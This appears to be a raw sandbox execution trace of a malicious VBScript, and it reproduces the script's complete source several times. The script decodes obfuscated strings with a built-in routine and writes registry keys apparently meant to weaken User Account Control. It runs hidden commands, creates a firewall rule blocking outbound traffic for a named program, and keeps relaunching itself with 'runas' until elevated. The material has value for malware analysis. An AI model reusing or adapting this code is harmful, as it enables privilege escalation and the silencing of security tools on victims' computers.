Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0223.033] wcsncmp (_String1="alPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.033] wcsncmp (_String1="lPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.034] SetLastError (dwErrCode=0xb) [0223.034] GetLastError () returned 0xb [0223.034] SetLastError (dwErrCode=0xb) [0223.034] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0223.035] CloseCodeAuthzLevel () returned 0x1 [0223.035] FreeLibrary (hLibModule=0x76650000) returned 1 [0223.035] SysStringLen (param_1="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n") returned 0x1067 [0223.036] GetCurrentThreadId () returned 0xf2c [0223.062] ISystemDebugEventFire:IsActive (This=0xca978) returned 0x1 [0223.062] GetCurrentThreadId () returned 0xf2c [0223.063] GetCurrentThreadId () returned 0xf2c [0223.063] GetCurrentThreadId () returned 0xf2c [0223.063] GetCurrentThreadId () returned 0xf2c [0223.089] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a90000 [0223.089] GetProcAddress (hModule=0x76a90000, lpProcName="CLSIDFromProgIDEx") returned 0x76aa0782 [0223.089] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x2aeeb4 | out: lpclsid=0x2aeeb4*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0223.093] SysStringLen (param_1=0x0) returned 0x0 [0223.093] GetProcAddress (hModule=0x76a90000, lpProcName="CoGetClassObject") returned 0x76ac54ad [0223.093] CoGetClassObject (in: rclsid=0x2aeeb4*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x6c4c4174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2aeea4 | out: ppv=0x2aeea4*=0x3637b0) returned 0x0 [0223.121] __dllonexit () returned 0x6dab160a [0223.121] __dllonexit () returned 0x6dab1624 [0223.122] __dllonexit () returned 0x6dab163e [0223.122] __dllonexit () returned 0x6dab16e6 [0223.122] GetUserDefaultLCID () returned 0x409 [0223.122] GetVersion () returned 0x1db10106 [0223.122] GetVersionExA (in: lpVersionInformation=0x2adaa8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2ada98, dwMinorVersion=0x2, dwBuildNumber=0x2b0000, dwPlatformId=0x6dab1cd4, szCSDVersion="ÈÚ*") | out: lpVersionInformation=0x2adaa8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0223.122] GetTickCount () returned 0x3f2f5 [0223.122] srand (_Seed=0x1169b75) [0223.122] LoadRegTypeLib (in: rguid=0x6dab2840*(Data1=0x420b2830, Data2=0xe718, Data3=0x11cf, Data4=([0]=0x89, [1]=0x3d, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x2ae148*=0x0 | out: pptlib=0x2ae148*=0xd4948) returned 0x0 [0223.127] ITypeLib:GetTypeInfoType (in: This=0xd4948, index=0x6dab298c, pTKind=0x36447c | out: pTKind=0x36447c*=874468) returned 0x0 [0223.151] SysStringLen (param_1="C:\\Users\\Public\\N3Eg\\uc") returned 0x17 [0223.151] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\uc") returned 0xffffffff [0223.151] GetLastError () returned 0x2 [0223.151] lstrlenW (lpString="WScript") returned 7 [0223.151] lstrlenW (lpString="WScript") returned 7 [0223.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0223.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0223.153] SafeArrayGetUBound (in: psa=0xce638, nDim=0x1, plUbound=0x2aec04 | out: plUbound=0x2aec04) returned 0x0 [0223.174] SysStringLen (param_1="C:\\Users\\Public\\N3Eg\\uc") returned 0x17 [0223.174] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\uc") returned 0xffffffff [0223.175] GetLastError () returned 0x2 [0223.191] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x2aeeb4 | out: lpclsid=0x2aeeb4*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0 [0223.196] SysStringLen (param_1=0x0) returned 0x0 [0223.196] CoGetClassObject (in: rclsid=0x2aeeb4*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x6c4c4174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2aeea4 | out: ppv=0x2aeea4*=0x75a92998) returned 0x0 [0223.198] Shell:IUnknown:QueryInterface (in: This=0x75a92998, riid=0x6c4d1100*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x2aeea0 | out: ppvObject=0x2aeea0*=0x0) returned 0x80004002 [0223.198] Shell:IClassFactory:CreateInstance (in: This=0x75a92998, pUnkOuter=0x0, riid=0x6c4c40a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2aeea8 | out: ppvObject=0x2aeea8*=0xe0640) returned 0x0 [0223.199] Shell:IUnknown:Release (This=0x75a92998) returned 0x1 [0223.199] IUnknown:QueryInterface (in: This=0xe0640, riid=0x6c4d0580*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x2aee6c | out: ppvObject=0x2aee6c*=0xe0660) returned 0x0 [0223.199] IObjectWithSite:SetSite (This=0xe0660, pUnkSite=0x3637b0) returned 0x0 [0223.199] IUnknown:AddRef (This=0x3637b0) returned 0x2 [0223.202] IUnknown:Release (This=0xe0660) returned 0x1 [0223.202] IUnknown:QueryInterface (in: This=0xe0640, riid=0x6c4c4140*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2aee5c | out: ppvObject=0x2aee5c*=0xe0640) returned 0x0 [0223.202] IUnknown:AddRef (This=0xe0640) returned 0x3 [0223.202] IUnknown:Release (This=0xe0640) returned 0x2 [0223.202] IUnknown:Release (This=0xe0640) returned 0x1 [0223.202] IUnknown:AddRef (This=0xe0640) returned 0x2 [0223.214] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0223.223] IUnknown:QueryInterface (in: This=0xe0640, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x2aef44 | out: ppvObject=0x2aef44*=0x0) returned 0x80004002 [0223.223] IDispatch:GetIDsOfNames (in: This=0xe0640, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2aef48*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x2aef60 | out: rgDispId=0x2aef60*=1610809345) returned 0x0 [0223.230] IUnknown:AddRef (This=0xe0640) returned 0x2 [0223.230] IUnknown:QueryInterface (in: This=0xe0640, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x2aef4c | out: ppvObject=0x2aef4c*=0x0) returned 0x80004002 [0223.230] IDispatch:Invoke (in: This=0xe0640, dispIdMember=1610809345, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2aef18*(rgvarg=([0]=0x2aee54*(varType=0x2, wReserved1=0x2a, wReserved2=0x3e80, wReserved3=0x36, varVal1=0xe0001, varVal2=0x6c4c18bb), [1]=0x2aee64*(varType=0x8, wReserved1=0x0, wReserved2=0x43d8, wReserved3=0x36, varVal1="runas", varVal2=0x6c4c18bb), [2]=0x2aee74*(varType=0x8, wReserved1=0x0, wReserved2=0x43d8, wReserved3=0x36, varVal1="", varVal2=0x6c4c18bb), [3]=0x2aee84*(varType=0x8, wReserved1=0x4651, wReserved2=0x4654, wReserved3=0x464b, varVal1="\"C:\\Users\\Public\\N3Eg\\N3E.vbs\" uac", varVal2=0x46574646), [4]=0x2aee94*(varType=0x8, wReserved1=0x0, wReserved2=0x43d8, wReserved3=0x36, varVal1="wscript.exe", varVal2=0x6c4c1684)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x2aeef4, puArgErr=0x2aef38 | out: 